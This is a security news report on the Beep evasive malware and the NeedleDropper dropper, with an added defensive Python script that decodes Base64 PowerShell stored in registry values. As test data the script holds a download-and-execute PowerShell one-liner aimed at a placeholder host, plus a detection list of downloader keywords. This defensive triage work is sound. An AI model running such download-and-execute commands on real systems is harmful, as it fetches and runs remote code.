Feb 15, 2023 - Ravie Lakshmanan
Cybersecurity researchers have unearthed a new piece of evasive
malware dubbed Beep that’s designed to fly under
the radar and drop additional payloads onto a compromised host.
“It seemed as if the authors of this malware were trying to
implement as many anti-debugging and anti-VM (anti-sandbox)
techniques as they could find,” Minerva Labs researcher Natalie
Zargarov said[1].
“One such technique involved delaying execution through the use
of the Beep API function[2], hence the malware’s
name.”
Beep comprises three components, the first of which is a dropper
that’s responsible for creating a new Windows Registry key and
executing a Base64-encoded PowerShell script stored in it.
The PowerShell script, for its part, reaches out to a remote
server to retrieve an injector, which, after confirming it’s not
being debugged or launched in a virtual machine, extracts and
launches the payload via a technique called process hollowing[3].
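The dropper stage described above (a registry value holding a Base64-encoded PowerShell script that is later executed) is one of the few parts of this chain that a defender can triage with plain tooling. The script below is an added example written for this page, not code from the article or from the Minerva Labs report: it takes a set of registry values (a constructed sample here; in practice the output of a registry export or a forensic collection), decodes anything that looks like a Base64 blob, trying UTF-16LE first because that is the encoding PowerShell's -EncodedCommand expects, and flags decoded scripts that contain download-and-execute indicators. The key paths, the sample one-liner and the indicator list are all assumptions chosen for illustration.

```python
import base64
import re

# Constructed sample data for this example only. The encoded blob is a
# harmless download-and-execute one-liner built here to exercise the
# decoder; it is not Beep's actual script and the key paths are made up.
SAMPLE_SCRIPT = (
    "$u='http://example.invalid/stage2'; "
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode()
SAMPLE_REGISTRY = {
    r"HKCU\Software\ExampleCo\Updater": SAMPLE_ENCODED,  # encoded script
    r"HKCU\Software\ExampleCo\Version": "1.4.2",         # benign value
}

# Substrings that, in a decoded script, commonly indicate a downloader
# or in-memory execution stage. Assumed list; extend for your environment.
SUSPICIOUS_TOKENS = (
    "IEX",
    "Invoke-Expression",
    "DownloadString",
    "WebClient",
    "FromBase64String",
    "-enc",
)

# A registry value is only worth decoding if it is a long, clean Base64 run.
B64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def looks_like_text(s: str) -> bool:
    """True if every character is printable or ordinary whitespace."""
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def decode_powershell_blob(value: str):
    """Decode a Base64 registry value to script text, or return None.

    UTF-16LE is tried first because PowerShell's -EncodedCommand takes
    UTF-16LE Base64; UTF-8 is a fallback for scripts encoded by hand.
    """
    if not B64_RE.match(value):
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:
        return None
    for encoding in ("utf-16le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if looks_like_text(text):
            return text
    return None


def scan_registry(values: dict) -> list:
    """Return a finding per value that decodes to a script with indicators."""
    findings = []
    for key, value in values.items():
        decoded = decode_powershell_blob(value)
        if decoded is None:
            continue
        lowered = decoded.lower()
        hits = [t for t in SUSPICIOUS_TOKENS if t.lower() in lowered]
        if hits:
            findings.append({"key": key, "script": decoded, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_registry(SAMPLE_REGISTRY):
        print(f"{finding['key']}: {', '.join(finding['indicators'])}")
        print(f"  decoded: {finding['script']}")
```

Feeding this a real registry export means replacing SAMPLE_REGISTRY with a mapping of value paths to string data; numeric and binary values are skipped by the Base64 check. The UTF-16LE-first order matters: a UTF-8 script of odd byte length fails the UTF-16LE decode outright, while an even-length one usually decodes to unprintable characters and is rejected by looks_like_text before the UTF-8 attempt.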
The payload is an information stealer that’s equipped to collect
and exfiltrate system information and enumerate running processes.
Other instructions the malware is capable of accepting from a
command-and-control (C2) server include the ability to execute DLL
and EXE files.
A number of other features are yet to be implemented, suggesting
that Beep is still in its early stages of development.
What sets the emerging malware apart is its heavy focus on
stealth: it adopts an unusually large number of detection evasion
methods[4] in an attempt to resist analysis, avoid sandboxes,
and delay execution.
“Once this malware successfully penetrates a system, it can
easily download and spread a wide range of additional malicious
tools, including ransomware, making it extremely dangerous,”
Zargarov noted.
The findings come as antivirus vendor Avast revealed details of
another dropper strain codenamed NeedleDropper
that has been used to distribute different malware families since
October 2022.
Delivered via spam email attachments, Discord, or OneDrive URLs,
the malware is suspected to be offered as a service for other
criminal actors looking to distribute their own payloads.
“The malware tries to hide itself by dropping many unused,
invalid files and stores important data between several MB of
unimportant data, and also utilizes legitimate applications to
perform its execution,” the company said[5].
References
[1] said (minerva-labs.com)
[2] Beep API function (learn.microsoft.com)
[3] process hollowing (attack.mitre.org)
[4] detection evasion methods (anti-debug.checkpoint.com)
[5] said (decoded.avast.io)
[6] Twitter (twitter.com)
[7] LinkedIn (www.linkedin.com)
Read more https://thehackernews.com/2023/02/experts-warn-of-beep-new-evasive.html